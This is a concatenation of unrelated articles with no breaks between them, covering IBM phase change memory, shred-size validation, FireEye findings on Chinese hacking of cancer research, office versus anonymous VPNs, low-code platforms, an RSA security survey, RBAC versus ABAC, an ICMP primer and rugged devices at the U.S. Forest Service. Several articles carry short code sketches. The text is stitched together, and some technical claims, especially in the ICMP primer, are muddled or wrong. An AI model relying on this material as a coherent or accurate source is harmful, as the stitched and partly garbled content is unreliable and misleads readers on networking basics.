There is no question that the memory hierarchy in systems is being busted wide open, and that new persistent memory technologies, byte addressable like DRAM or block addressable like storage, are going to radically change the architecture of machines and the software that runs on them. Picking which memory might go mainstream is another story.

It has been decades since IBM made its own DRAM, but the company still has a keen interest in doing research and development on core processing and storage technologies and in integrating new devices with its Power-based systems. To that end, IBM Research is announcing that it has successfully created and tested phase change memory (PCM), an alternative storage technology that sits between DRAM and flash in the memory hierarchy (much like the 3D XPoint memory developed by Intel and Micron Technology) and that stores three bits per memory cell – an important development if the cost of PCM is to be brought down to be more competitive with DRAM and flash. IBM is also showing off a second generation of PCM memory cards that it has developed using existing PCM technology and coupled very tightly to its Power8 systems using its Coherent Accelerator Processor Interconnect (CAPI) interface.

Phase change memory has been in development since the 1970s and is one of the many contenders as an adjunct to DRAM and flash in the memory hierarchy. As the name suggests, the ones and zeros of binary data storage are induced by a phase change in a material – in this case a chalcogenide alloy of antimony, germanium, and tellurium that, with the application of heat, can be put into either a crystalline or an amorphous state; data can be stored in either state, which is extremely useful. Micron originally developed its first generation of PCM memory chips for smartphones because PCM is extremely fast and uses very little power compared to flash, but it is based on a complex substance and is difficult to manufacture. So driving up the bit density, and therefore the overall capacity, of PCM is an important step towards commercializing this technology.

That said, given the relatively low storage density of PCM compared to flash and perhaps 3D XPoint, it stands to reason that PCM may be relegated to the parts of systems where latency of access, persistence of data, and high durability are more important than capacity. PCM can endure up to 10 million write cycles, says IBM, compared to about 3,000 write cycles for the kind of flash used in a USB stick these days, falling to maybe 300 to 500 cycles with the triple level cell (TLC) flash that is commonly used in enterprise applications. Compared to this flash, PCM has what is effectively an eternal wear level.

In any event, up until now PCM was able to store one bit per memory cell, but a team of researchers at IBM's lab in Zurich, Switzerland has demonstrated that it can store two bits per cell and has a path to three bits per cell – equivalent to the density of modern flash memory. The PCM research is being led by Haris Pozidis, manager of non-volatile memory systems at IBM Research, and the team's findings are being presented in a paper at the International Memory Workshop in Paris. "Phase change memory is the first instantiation of a universal memory with properties of both DRAM and flash, thus answering one of the grand challenges of our industry," Pozidis said with regard to the research that IBM has been doing.
"Reaching three bits per cell is a significant milestone because at this density the cost of PCM will be significantly less than DRAM and closer to flash."

This is, of course, precisely the part of the memory hierarchy that Intel and Micron are pursuing with their 3D XPoint memory, which many speculate is based on resistive RAM (ReRAM) technology, not PCM. At this time, 3D XPoint is implemented in a 20 nanometer process, stores data at a density of one bit per cell (SLC), has a 7 microsecond latency for reads, and delivers on the order of 78,500 IOPS in the 70/30 read/write mix that is typically used to characterize storage. (These stats are courtesy of Chris Mellor over at our sister publication, The Register.) DRAM access is on the order of 200 nanoseconds, or about 35X faster than Intel's Optane 3D XPoint, but 3D XPoint is about four times faster on writes than a PCI-Express flash unit using the trimmed down NVM-Express protocol and about twelve times faster than this flash on reads.

To push PCM up to MLC and then TLC densities, IBM created its own 2×2 Mcell array with a four-bank interleaved architecture comprising a 64K cell array, and by running it at elevated temperatures and through 1 million set and reset endurance cycles it was able to demonstrate two bits per cell of storage and a means of delivering three bits per cell. To accomplish this feat, IBM came up with a set of metrics for monitoring the state of the PCM cells that are immune to the effects of drift in the state of the underlying material, plus coding and detection methods that are tolerant of this drift and therefore prolong the longevity of the storage as its density is increased. It is unclear how this research will be used to improve actual PCM devices, but IBM is always interested in licensing its technology.

In the meantime, Big Blue is showing off the second generation of PCM cards interfacing with its Power8 systems and delivering much better performance than is possible with flash storage. Back in early 2014, IBM researchers partnered with Micron and FPGA maker Xilinx to create a PCM server card based on Micron's P5Q PCM chips under Project Theseus. These 128 Mbit PCM chips are manufactured by Micron in a very mature 90 nanometer process and cycle at 66 MHz. The P5Q chips have very asymmetric read and write performance, with writes taking about 1.15 milliseconds and reads taking about 75.25 microseconds, which translates into 860 operations per second on writes and 13,290 operations per second on reads.

This first generation card married a Xilinx Zynq-7045 FPGA board (which was programmed as a memory controller) with two channels of PCM memory, and it delivered 65,000 read IOPS at a latency of 35 microseconds and 15,000 write IOPS at a latency of 61 microseconds. Importantly for applications that require consistency of performance, 99.9 percent of the I/O requests were completed within 240 microseconds, which was 12X better than the MLC flash devices and 275X better than the TLC flash devices that IBM tested two years ago. With its second generation PCM prototype, IBM was specifically interested in testing how PCM memory in a PCI-Express form factor would perform when linked to the Power8 processor complex using CAPI ports. This new card was implemented using the same P5Q PCM memory from Micron.
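As a quick sanity check on those throughput figures, per-channel operations per second are just the reciprocal of the access latency. A minimal sketch in Python using the P5Q latencies cited above (single channel, one operation at a time):

    # Throughput implied by the P5Q latencies cited above
    write_latency_s = 1.15e-3     # about 1.15 ms per write
    read_latency_s = 75.25e-6     # about 75.25 us per read

    print(round(1 / write_latency_s))  # ~870 writes per second (the article rounds to 860)
    print(round(1 / read_latency_s))   # ~13,289 reads per second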
IBM also tested a next generation PCM card that emulated PCM using DRAM and then put the memory on a DDR3 interface, which is scenario two in IBM's chart. With the CAPI interface, the older P5Q PCM memory card was considerably faster than the original implementation that IBM did two years ago in its initial tests, and the performance was both high and predictable. And with the improved PCI-Express card, which puts the emulated PCM memory on DIMMs plugged into the FPGA card, the latency drops even further and the gap between reads and writes closes a bit, too.

It will be interesting to see how actual PCM memory does compared to this emulated PCM memory. But with the emulated PCM, IBM says that it is working to squeeze more performance out of the CAPI-FPGA-PCM stack by optimizing its protocols, and it is looking to support multiple PCM channels on the cards (as it did with its initial experiments two years ago) to boost the throughput and capacity of the PCM memory. Then, when the next generation of PCM is actually available, IBM and its partners will be ready to roll it into production.

It is unclear what IBM's plans are with regard to 3D XPoint memory, but anything it is doing with PCM it can, in theory, do with 3D XPoint. While Intel is expected to emphasize its Optane SSDs and DIMMs for its own Xeon systems, Micron can sell its portion of the 3D XPoint memory coming out of their joint operations to whomever it chooses. Micron has been mum on precisely what its plan is here, but it is likely that some OpenPower partners, such as Alpha Data, which made the PCI-Express cards used in the CAPI tests above, could integrate any number of different memory technologies on their FPGA cards and create controllers to drive them and act as an interface to the Power8 compute complex through CAPI.
SHRED SIZE VALIDATION with VIZION

Where physical destruction of storage media is concerned, shredding is one of the most used techniques. The speed at which storage media is rendered inoperable is one of the attractions of this process, with only laboratory-based data recovery techniques being viable against the output. The techniques which could be applied to shredded material are typically:

- Platter-level recovery using Magnetic Force Microscopy.
- Decapsulation of shredded NAND cells.
- Chip readers for intact NAND cells post shred.

Countermeasures to these techniques typically specify a shred size which renders these types of attack unfeasible. Because storage media differ in nature, there are different expectations for the size of the particles output from a shredding process, based on the ability to recover data from them. There are standards which specify the size of shredded material, including ISO/IEC 21964, which specifies a particle size by media type and security level.

Vizion is a blend of high-resolution imagery, using a light box and camera, followed by an analysis process using proprietary software which is able to measure the two longest dimensions of each particle and compute its surface area. Even for irregular shapes, the software is able to accurately identify the particle area.
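Vizion's analysis software is proprietary, but the core measurement it describes (the two longest dimensions of a particle plus its true area, even for irregular shapes) can be sketched with off-the-shelf computer vision tools. A minimal illustration in Python with OpenCV, assuming a calibrated top-down light-box image in which particles appear dark on a bright background; the file name and scale factor are placeholders:

    import cv2

    PX_PER_MM = 40.0  # assumed calibration: pixels per millimetre

    img = cv2.imread("shred_sample.png", cv2.IMREAD_GRAYSCALE)
    # Otsu threshold: dark particles become white foreground on black
    _, mask = cv2.threshold(img, 0, 255, cv2.THRESH_BINARY_INV + cv2.THRESH_OTSU)
    contours, _ = cv2.findContours(mask, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)

    for c in contours:
        (cx, cy), (w, h), angle = cv2.minAreaRect(c)   # tightest rotated bounding box
        length_mm = max(w, h) / PX_PER_MM              # longest dimension
        width_mm = min(w, h) / PX_PER_MM               # second-longest dimension
        area_mm2 = cv2.contourArea(c) / PX_PER_MM**2   # true area, even for irregular shapes
        print(f"{length_mm:.2f} x {width_mm:.2f} mm, area {area_mm2:.2f} mm^2")

Note that the contour area, not the bounding-box area, is what captures irregular shapes correctly, which matches the distinction the product description draws.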
After China's cancer rate surged in recent years, Chinese authorities went looking for an answer to the problem. They appear to have found a useful tool in the country's cyber capabilities.

Over the last two years, Chinese government-linked hackers have targeted organizations involved in cancer research on multiple occasions, cybersecurity company FireEye said in a report published Wednesday. In at least one case, more than one group has gone after the same organization — evidence of a relentless pursuit of research data.

"It makes sense when you look at the larger context that China's operating in," said Luke McNamara, principal analyst at FireEye, referring to the cancer scourge in China and the resulting social costs.

In one incident in April, Chinese hackers targeted a U.S.-based cancer research organization with a malware-laced document referencing a conference the organization hosted. A year earlier, the newly named Chinese hacking outfit APT41 spearphished employees of the same entity.

The hunt for cancer research appears to have gone beyond American organizations. In late 2017, APT10 — which U.S. officials have tied to China's civilian intelligence agency — went on an expedition against health care organizations in Japan with documents related to cancer research conferences, according to FireEye.

Cancer research is but one segment of the medical sector allegedly pursued by these groups. Device manufacturers and other intellectual property-rich vendors have also found themselves in the crosshairs. "Targeting medical research and data from studies may enable Chinese corporations to bring new drugs to market faster than Western competitors," the FireEye report says.

The Chinese Embassy in Washington did not immediately respond to a request for comment. China has denied allegations that it uses hacking to advance its economic goals.

China is the most notable sponsor of health care-focused espionage named in the FireEye report, but not the only one. A handful of other examples include Russian military hackers' attacks on anti-doping agencies, which resulted in an indictment by the U.S. Department of Justice last year, and Vietnam's APT32 going after a British health care organization.

A trove of health data for spying

Hackers have demonstrated an interest in collecting health records in bulk in recent years. The data is coveted by spies because it can be used to build a profile of foreign officials' frailties, for example.

Two of the more prominent breaches of insurance and health care organizations allegedly involve Chinese hackers. In May, U.S. prosecutors unsealed an indictment of a Chinese national related to the 2015 hack of health insurer Anthem that exposed personal information on nearly 79 million people. In July 2018, Singapore announced that hackers had accessed the personal information of 1.5 million patients of the country's health care system in what authorities labeled a foreign government operation.

In its report Wednesday, FireEye said the Singapore breach bore the fingerprints of a Chinese espionage group that has attacked media, government, and transportation organizations in Southeast Asia, among others.
One of the most important parts of your network security, when it comes to devices connecting through the internet, is a virtual private network (VPN). A number of online activities can create risk. Two of the biggest are remote employees connecting to your network and users on your network connecting to the outside world. Any time a device is using a connection, it can open a portal that leaves data transmissions at risk of being compromised and leaves the network vulnerable to a hacker. 28% of data breaches are caused by weak remote access security.

A VPN is a way to secure those network connections by adding a layer of encryption to the traffic being transmitted and by controlling network access. But all VPNs are not the same. Two distinct types are firewall-based office VPNs and anonymous VPNs, which are typically provided as an application. We'll break down each type below, so you'll understand their uses and how they can be applied to your cybersecurity needs.

How Does an Anonymous VPN Differ from an Office VPN?

Several factors go into the choice between an office VPN and an anonymous VPN, including considerations of cost, reliability, and security. One of the main differences between the two types of virtual private network is that an office VPN, which is firewall-based, is controlled locally, whereas an anonymous VPN is controlled by a third-party provider. Here is an overview of both types.

Firewall-based Office VPN

With the office VPN, you are getting a combination of a network firewall and a virtual private network in one. Firewalls are designed to protect your internal network by monitoring all traffic coming in and going out. The VPN gains added security from firewall processes such as address translation, user authentication, alarms, and monitoring. Companies can have either a hardware or a software firewall: a hardware-based firewall is a piece of equipment connected to the office network, while a software firewall uses an installed application to provide firewall protection. The VPN can either be placed in front of the firewall, or behind it, with the firewall serving as the outer ring of protection.

Anonymous VPN

An anonymous VPN is the one you're looking at when you see products like NordVPN or ExpressVPN. They're marketed to both consumers and business users. This type of VPN makes your IP address anonymous: instead of seeing your router's IP address, a website you visit sees the IP address of the VPN provider's server that you're using to connect. This type of VPN involves downloading software onto a device and turning it on. Once on, it secures the connections that device is making.

How Each VPN Protects Traffic

An office VPN is like having a team of sentries stand guard over your network, ensuring that only approved traffic comes in and out and that the traffic is secure. An anonymous VPN is device-based and is more like a shield that a soldier carries around for protection: as you connect online, it secures that connection.

You have much more control of security policies and user authentication when using an office VPN. For example, you have the ability to set up challenge questions or other modes of authentication before allowing a remote user to connect to the VPN. When you're using an anonymous VPN through a third-party provider, your options are more limited. Most of these have a simple username/password login and the ability to add multi-factor authentication, but you don't have the same policy controls.
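The article doesn't tie this to any particular product, but as an illustration of the per-user control an office VPN gives you, here is a minimal sketch of a WireGuard-style server configuration (WireGuard is one common VPN implementation; the keys, addresses, and port shown are placeholders):

    [Interface]                       # the office VPN endpoint
    Address = 10.8.0.1/24             # private tunnel subnet
    ListenPort = 51820
    PrivateKey = <server-private-key>

    [Peer]                            # one authorized remote employee
    PublicKey = <employee-public-key>
    AllowedIPs = 10.8.0.10/32         # this peer may only use this tunnel address

Each remote user is an explicitly enumerated peer under your control; with an anonymous VPN service, the equivalent configuration lives on the provider's servers, which is why those policy controls stay out of your hands.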
When it comes to cost, the anonymous VPN is the most economical, because it's a monthly service that you're paying for per user, similar to a cloud service subscription. Firewall-based VPNs are usually an outright purchase when you buy the firewall, although software-based ones can offer significant savings over hardware firewall/VPNs.

Speed and Reliability

Because office VPNs are locally connected to your network to secure remote traffic, they tend to be faster and more reliable than VPNs hosted on a provider's server. With an anonymous VPN, you're relying entirely on the service provider's server, whose speed and reliability can be hampered by things like how far away the server is and how many other users are accessing it.

Ease of Use

Once set up, an office VPN can be just as easy to use as an anonymous VPN. However, to take advantage of its flexibility for customization, there is generally more setup work involved than with an anonymous VPN, which can be used "out of the box" fairly quickly.

Which VPN is Right for Your Company's Needs?

You don't want to guess when it comes to deciding which VPN to use. Instead, contact C Solutions. We can do a full assessment of your network protection needs and recommend the best VPN to match them. Schedule a free network assessment today! Call 407-536-8381 or reach us online.
As described on Wikipedia: Low-code development platforms (LCDPs) allow the creation of application software through graphical user interfaces and configuration instead of traditional procedural computer programming. The platforms may focus on the design and development of databases, business processes, or user interfaces such as web applications. Such platforms may produce entirely operational applications, or require or allow minimal coding to extend the application's functionality or to handle uncommon situations. Low-code development platforms reduce the amount of traditional hand-coding, enabling accelerated delivery of business applications. A common benefit is that a wider range of people can contribute to the application's development, not only those with more formal programming experience. LCDPs also lower the initial cost of setup, training, and deployment.

Low-code development platforms employ visual, declarative techniques, which define data, logic, flows, forms, and other application artifacts without writing code, according to Forrester Research. Imagine Lego blocks for software application development. Developers may code to integrate access to older applications, for reporting, and to customize for special user interface (UI) requirements, Forrester analyst John Rymer wrote in an October 2017 research report.

Why is There a Shift from Traditional Coding to Low-Code?

Low-code development platforms have been gaining widespread traction among enterprises worldwide as a way of tackling the challenges of traditional coding with programming languages.

1. Difficult to meet desired timelines complementing go-to-market strategy: Every business unit is crafting its digitization needs and roadmap, yet time is a fixed constraint. It is challenging to bring products to market quickly with traditional coding. A proof of concept (POC) with a minimum viable product (MVP) often takes more time than is justifiable.

2. Lack of agility: Change is inevitable in business, so embrace it. The lack of configuration tools for form and process flow changes makes it challenging for programmers to adapt to business rule changes, as it often leads to longer development time and, to some extent, unmanaged scope creep.

3. High long-term maintenance costs: Compared with making changes through configuration, an application system developed by coding with programming languages and frameworks will require development continuity and support from qualified and experienced full-stack software engineers. Knowledge and technology transfer from the application's creator to another person will also require extensive programming competency as a prerequisite. Thus, the long-term maintenance cost of such an application system also includes the costs associated with talent retention. Otherwise, when maintainability falls away, the application system eventually suffers, along with higher technical debt. When every feature is developed from code, even a commonly used user interface component such as a pagination table with search filters can present a programmatic bug.

How to Compare Low-Code Development Platforms?

Implementing software isn't difficult; often, it is only the beginning. Maintaining and sustaining it is the tricky question. We have published an evaluation checklist that covers the following aspects:

- App Development
- App Maintenance
- Ecosystem and Support
Data breaches and cyberattacks happen daily, across industries and to businesses of all sizes. However, as these attacks become more sophisticated, companies admit that they are at a loss on how best to protect their data.

According to eWeek, a study from RSA shows that those responsible for protecting the network don't necessarily trust their information security capabilities. The Cybersecurity Poverty Index survey revealed that four in 10 companies admitted that their security capabilities were "functional," or, in terms of the survey, average. In all, approximately 75 percent of the 400 companies interviewed confessed that their security abilities were either average or below average when compared to the standards suggested by the Cybersecurity Framework, which was developed by the U.S. National Institute of Standards and Technology.

The RSA study used five areas to measure information security capabilities, as eWeek reported: The five components of an information-security program include identifying threats, protecting information assets, detecting attacks, responding to incidents and recovering from compromises.

According to InfoSecurity Magazine, a second study conducted at RSA, this one from Venafi, found a serious disconnect between actual information security capabilities and what IT professionals choose to believe. The 2015 RSA Conference survey showed that IT organizations are often too trusting of certificates and cryptographic keys: [M]ost security departments and systems blindly trust keys and certificates, which leaves enterprises unable to determine what is 'self' and trusted in their networks and what is not, and therefore dangerous. This means that cyber-criminals can use them to hide in encrypted traffic, spoof websites, deploy malware and steal data.

This study revealed that IT support staff struggles to detect and correct compromised certificates or keys. The survey found that 78 percent of respondents only conduct a partial remediation due to their implicit trust in the security capabilities of keys and certificates. And to make things worse, most companies have no strategy in place to handle a security incident involving vulnerable keys and certificates, which weakens information security capabilities even more.

Most businesses reported that they are most confident with the most traditional methods of security – primarily protecting the perimeter and the data inside the perimeter – at a time when this type of protection is less effective. But where confidence is truly lacking is in the maturity of the security systems and their ability to defend against a more sophisticated attack.

Weak security may be the one area where large and small companies are on equal footing. Organizations of all sizes appear to struggle with putting adequate security tools in place. While part of the reason for this struggle has to do with a lack of funds – most security experts admit that security remains near the bottom of the IT-funding list despite the threat risk – a greater reason is that in-house staff isn't able to keep up with the ever-evolving sophistication of the attacks. Organizations are not adequately protecting all of the data at multiple points.

There can be no excuses for not being confident in information security capabilities in today's threat environment. Too much is at risk for both the enterprise and its customers. If organizations aren't comfortable enough with the security systems currently in place, it may be time to look for help from outside.
Sue Marquette Poremba has been writing about network security since 2008. In addition to her coverage of security issues for IT Business Edge, her security articles have been published at various sites such as Forbes, Midsize Insider and Tom’s Guide. You can reach Sue via Twitter: @sueporemba
Controlling access to devices and resources is one of the most basic protections an enterprise needs to have in place to stay secure. Implementing access controls minimizes the exposure of key resources and helps you to comply with regulations in your industry. Currently, there are two main access control methods: RBAC and ABAC. RBAC stands for Role-Based Access Control and ABAC stands for Attribute-Based Access Control. In this article, we're going to look at what RBAC and ABAC are, and which is best for managing user access to resources.

What is RBAC?

RBAC is a method that manages access controls based on roles. A network administrator determines the access privileges of a role, such as whether the role can create and modify files or is restricted to reading them. Under RBAC, the role employees are given determines what resources they have access to. The level of access can be influenced by the seniority of the users in question and whether the materials are critical to their everyday work.

When using RBAC, it's best practice to restrict access to resources unless they're absolutely necessary for a particular role. This limits the risk of data leaks. In other words, employees should only have access to the systems and materials needed to carry out their jobs – and nothing more. This minimizes the risk of an asset being compromised.

There are four levels of role-based access control that can be implemented:

- Flat RBAC – All users and permissions are assigned roles. A user must take on a role to obtain the permissions needed. As a consequence, a user can be assigned multiple roles to have multiple permissions, and roles can be assigned to multiple users.
- Hierarchical RBAC – Adds a hierarchy to the role structure that sets out relationships between roles. Higher-seniority roles acquire the permissions of junior roles.
- Constrained RBAC – Adds a separation of duties so that multiple users must complete a single task, ensuring that no malicious changes can be made to your system.
- Symmetric RBAC – The company periodically reviews the permissions associated with each role. An administrator can pull permissions from one user and then reassign them to another individual.

What is ABAC?

ABAC uses attributes, a set of labels and properties, to determine who has access to what resources. Attributes include attributes of the subject, attributes of objects, environmental conditions, and policies. In practice, attributes can include everything from the position of employees to their departments, IP addresses, devices, and more. For example, an administrator could restrict access to a resource by setting one attribute to role = supervisor and another to department = marketing. These attributes act as conditions and determine what a user needs in order to have access to a resource or system.

Access can be controlled by using the eXtensible Access Control Markup Language (XACML) to set access control rules. The model uses Boolean logic following an IF, THEN format to decide a user's access based on the attributes. The process is automated, which makes it an efficient way of managing access permissions, as an administrator doesn't need to continually assign or reassign roles to users.
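XACML itself is verbose, but the underlying IF/THEN attribute logic is easy to illustrate. A minimal sketch in Python — the attribute names and policies here are hypothetical, not drawn from any particular product:

    # Each policy: IF all attribute conditions match the request, THEN permit.
    POLICIES = [
        {"role": "supervisor", "department": "marketing", "resource": "campaign-data"},
        {"role": "engineer", "device_trusted": True, "resource": "source-repo"},
    ]

    def abac_permit(request: dict) -> bool:
        """Permit if any policy's conditions are all satisfied by the request."""
        return any(
            all(request.get(attr) == value for attr, value in policy.items())
            for policy in POLICIES
        )

    # A marketing supervisor may read campaign data:
    print(abac_permit({"role": "supervisor", "department": "marketing",
                       "resource": "campaign-data"}))   # True
    # An engineer on an untrusted device is denied:
    print(abac_permit({"role": "engineer", "resource": "source-repo",
                       "device_trusted": False}))       # False

Because access is decided at request time from current attribute values, changing a user's department or device status changes their access immediately, with no role reassignment.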
What's the difference between RBAC vs ABAC?

The main difference between RBAC and ABAC is that the former is role-based and assigns permissions based on role, while the latter is attribute-based and grants access based on attributes that can change in real time. For example, if employees are moved to a different department, their current permissions can automatically be revoked and they can immediately be granted the access needed for their new roles.

ABAC is mostly used by larger enterprises because of its complexity. It takes time to define the attributes needed for the system to function. However, once ABAC is configured, it is much more efficient than RBAC because the entire process is automated.

How can I choose between the two?

The choice between the two depends on your use case. If you want to make simple and broad access role decisions, then RBAC is a natural choice. However, if you need to add lots of specific restrictions and access conditions, then you should use ABAC. As a general rule of thumb, you should implement RBAC before ABAC. The reason is that both RBAC and ABAC act as filters: if RBAC can sufficiently control access to your key resources, then there's no point paying for the extra complexity of ABAC. It is important to note that you can also take a hybrid approach and use both RBAC and ABAC. We're going to look at the advantages and disadvantages of each solution in further detail below.

Benefits of RBAC

While RBAC may not be as cutting-edge as ABAC, it still has a set of entrenched advantages for managing access permissions. These are as follows:

- Increased efficiency
- Lower risk of data breaches
- Regulatory compliance
- Lower costs

A key advantage of RBAC is that it's more efficient. You can add new roles and edit existing roles quickly, which allows you to onboard new staff rapidly. Another is that gatekeeping access to sensitive data lowers the risk of data breaches and of falling victim to a cyber attack. The increased efficiency also helps from a compliance perspective, as it enables you to verify that you're keeping sensitive data private, and RBAC is simple enough that you can see how employees interact with data. This is invaluable for making sure that you don't fall foul of any regulations in your industry. RBAC can also be used to reduce costs by limiting access to certain resources. For example, if you stop employees from accessing a bandwidth-intensive application, you preserve other resources like your network bandwidth.

Limitations of RBAC

Although RBAC does come with many benefits, it isn't without some significant disadvantages; these are:

- Role explosion

One of the biggest problems RBAC has is role explosion. If you're in an environment with lots of roles with unique permissions, it can be difficult to manage all the roles your team needs to work effectively. It is here that the automated nature of ABAC stands out as a better alternative.

While RBAC can be efficient, it can also be difficult to manage compared to ABAC because it isn't automated. It becomes very difficult to manage if administrators add roles to users without removing them; it's not uncommon for users to end up with multiple roles and permissions that all need to be proactively managed or they can easily spiral out of control.

If your company onboards a lot of new hires, you're going to find it very difficult to scale up when using RBAC. You'll need to define new roles for each hire, which involves lots of manual legwork.

Benefits of ABAC

ABAC has a number of benefits for managing permissions:

- Automatically updates permissions
- Less admin

Users don't have to manually manage roles with ABAC; instead, they can define attributes and automate the system.
The system permits or denies access requests based on the attributes of the user and the object, so once the attributes of users change, so do the materials they can access. Users only need to change attribute values rather than change the relationships between subjects and objects.

ABAC also comes with less admin (at least after it's set up!). With access permissions changing automatically as user attributes change, there's less administration when onboarding new users; for example, you don't need to assign authorization to subjects before they try to access material.

There are also security advantages to using ABAC, such as being able to restrict users from accessing resources on unknown devices. This provides administrators with another buffer of security, letting them ensure that users interact with important services only from secure devices.

Although ABAC does have some distinct strengths, it isn't without its drawbacks:

- Difficult to audit

ABAC can become very complex to configure, particularly in environments with lots of information sharing. An administrator has to specify lots of policies to determine what attributes users need in order to access resources, and trying to manage attributes for all users can be a challenge.

Another key challenge is that ABAC is very difficult to audit. For security and regulatory compliance, it's important to be able to see exactly which resources a user has access to. With RBAC this is easy: you can just look at the privileges the user has been assigned. With ABAC you're rarely able to look up a user and see what they have permission to access, as you'd have to check each object against the access policy.

The scalability of ABAC also remains unclear. Systems with hundreds or thousands of users are extremely difficult to manage and consume a significant footprint of system resources.

Do what's best for your access control process

No matter which way you lean in the RBAC vs ABAC debate, you need a concerted plan in place for your access control process. Without access controls, there's nothing to stop an employee from accessing sensitive data. Adhering to the principle of least access and making sure that employees only have access to the essentials lowers the risk of running into cybersecurity issues and losing important data.

Pick an access control methodology that works for your environment. If the simple approach of RBAC works for you, then stick with that. If you want more efficiency with automation, then ABAC is worth taking a look at.

RBAC and ABAC FAQs

Is ABAC better than RBAC?

The option to name attributes as access control conditions gives ABAC more flexibility than RBAC. The option to introduce multiple conditions in one rule is very powerful, but it means an ABAC system needs a lot of planning. So, for large businesses that have a specialist on staff, ABAC is probably the winner. Smaller businesses with a more straightforward staffing hierarchy would be better off sticking with RBAC.

What is the ABAC access control model?

ABAC stands for Attribute-Based Access Control. It provides a range of conditions that can be used to test whether a connection should be allowed or blocked. The system is complex enough that it is implemented with its own language, called the eXtensible Access Control Markup Language (XACML). XACML rules can draw on environmental conditions instead of just user or address circumstances.

Is ABAC rule-based?

An ABAC filter is like a series of IF statements – each line is a rule.
So, attribute-based access control is a rule-based system.
ICMP stands for the Internet Control Message Protocol. It is a primary protocol in the Internet Protocol Suite, used by network devices to relay error messages and management queries, and it helps reroute a message onto its right course. ICMP is best known as the protocol behind the PING command in Windows and Unix operating systems.

ICMP is considered an essential part of IP. However, it is built upon IP (it relies on IP to transmit its data from one end to the other), and thus ICMP must be implemented in all IP modules. The general role of ICMP is to generate error packets about the network. ICMP messages fall into two categories:

- Error reporting messages
- Query messages

Each category is further divided into types of messages. ICMP messages are relayed in IP datagrams; the IP header carries protocol number 1, indicating ICMP, and a type of service of 0 (routine).

ICMP has numeric message codes:

0: Echo reply
3: Destination unreachable
4: Source quench
5: Redirect – use a different router
8: Echo request
9: Router advertisement
10: Router solicitation
11: Time exceeded

The ICMP header comes after the IPv4/IPv6 packet header, and ICMP is identified as IP protocol number 1. The header contains three fields:

Type – identifies the ICMP message, and whether it is an error or query message.
Code (minor code) – provides more information about the specific kind of message within either the query or error-reporting category.
Checksum – helps detect errors introduced during transmission.

Two rules apply:

- ICMP may report errors on any IP datagram except ICMP messages themselves, to avoid endless repetition.
- For fragmented IP datagrams, ICMP messages are sent only for errors on fragment zero; that is, ICMP messages do not refer to IP datagrams with a non-zero fragment offset field.

The ICMP Structure

Whenever a router bounces back an ICMP packet to report an error, it reproduces the fields of the original IP header of the packet it is reporting on. A standard packet carrying lots of data can also have an ICMP section embedded in it, though an ICMP tunnel has to be programmed for this to take place.

ICMP can be abused in attacks, which can be prevented through:

- Web application firewalls
- Intrusion detection systems
- Blocking all ICMP activity at the main network entry point

ICMP, therefore, gives feedback on communications when things go wrong. It is used for exchanging information between hosts about the state of the network, not for transferring application data. The conditions provoking an ICMP packet are mostly found in the IP header of the failed packet. ICMP messages are carried inside IP packets, so ICMP sits at a higher level than the operating structures of switches. ICMP is used mostly by network administrators as a diagnostic utility to troubleshoot internet connections.

Related – ICMP vs IGMP
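As an illustration of the three header fields described above, here is a minimal sketch in Python that builds an ICMP echo request (type 8, code 0) and computes its checksum with the standard internet checksum algorithm from RFC 1071; the identifier, sequence number, and payload are arbitrary example values:

    import struct

    def internet_checksum(data: bytes) -> int:
        # RFC 1071: one's-complement sum of 16-bit words, then complemented.
        if len(data) % 2:
            data += b"\x00"
        total = 0
        for i in range(0, len(data), 2):
            total += (data[i] << 8) | data[i + 1]
            total = (total & 0xFFFF) + (total >> 16)  # fold the carry back in
        return ~total & 0xFFFF

    # Echo request header: type (8), code (0), checksum, identifier, sequence.
    # The checksum is computed over the whole message with the checksum
    # field zeroed first, then filled in.
    ident, seq, payload = 0x1234, 1, b"ping"
    header = struct.pack("!BBHHH", 8, 0, 0, ident, seq)
    checksum = internet_checksum(header + payload)
    packet = struct.pack("!BBHHH", 8, 0, checksum, ident, seq) + payload
    print(packet.hex())

A receiver runs the same sum over the received message; if anything was corrupted in transit, the checksum will not verify, which is exactly the error detection the Checksum field provides.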
Photographs Courtesy of the U.S. Forest Service

Protecting and managing 191 million acres of land is truly rugged work. Each year, hundreds of U.S. Forest Service field engineers go deep into the nation's forests and grasslands to collect data on natural resources and wildlife to be used in a variety of surveys and projects. For decades, the Forest Service has equipped its fieldworkers with rugged devices that meet military specifications – units that can withstand shock and extreme temperatures and are impervious to dust – upgrading the devices as technology has improved.

"Our handheld devices are subjected to a high degree of punishment. They've been dropped off bluffs, submerged in mountain streams, even carried 150 feet high into trees to record insect counts," says Art Clinton, National Mobile Computing Program Manager for the Forest Service, an agency of the Agriculture Department.

This means that any rugged device the Forest Service provides for its fieldworkers must not only meet current military standards, but also be dustproof, water-resistant and shock-resistant. The device must have enough battery life for a full day's mission, and screen resolution viewable in bright sunlight. The agency also requires such devices to have ergonomic input features.

Until 2007, Forest Service engineers primarily used rugged handheld computers with embedded GPS. As the agency's mission has expanded over the past several years to include fire and aviation, stream surveys in water, avalanche surveys and timber data collection in Alaska, the technology has become even more rugged. In 2007, for example, the agency equipped all of its law enforcement officers with in-vehicle rugged notebook computers. It also has some rugged ultra-mini PCs and some rugged PCs that can convert into tablets or slates.

The use of rugged and semi-rugged mobile devices from manufacturers such as Panasonic, Getac and General Dynamics has grown considerably over the past several years. Typically, government users are fieldworkers who are exposed to harsh conditions – such as extreme temperatures and environments with large amounts of dust and other particulates or vibrations – that can adversely affect the performance of mobile devices that are not designed to operate in these environments.

"We have witnessed significant advances in terms of overall industrial design and ergonomics of these devices," says David Krebs, vice president for enterprise mobility and connected devices at VDC Research. "While rugged devices will always be heavier than similar-sized, nonrugged devices, the difference is shrinking, especially for devices designed to be more portable, such as tablets. And the drop specification continues to improve as vendors become more aggressive with their product positioning and capabilities."

Ruggedization Takes Off

Aircraft maintenance personnel at Robins Air Force Base in Georgia have used rugged or semi-rugged notebooks or tablets for several years. The push started in 2009 when a report from the Air Force Inspector General's office called for the use of digitization in the field. When considering what type of mobile devices to provide to aircraft maintenance crews, Air Force officials quickly came to the conclusion that commercial-grade notebooks and tablets wouldn't meet their needs.

Handheld devices used by the Forest Service take a lot of punishment, says Art Clinton, the agency's National Mobile Computing Program Manager. Photographs Courtesy of the U.S. Forest Service
"They initially bought regular laptops, but they were getting dropped, and they weren't of much use after that," says Gregg Kelley, Robins' program manager for e-tools. "We knew we needed shockproof devices that also had screens that could be read in direct sunlight and could handle the heat and humidity typical of weather in Georgia."

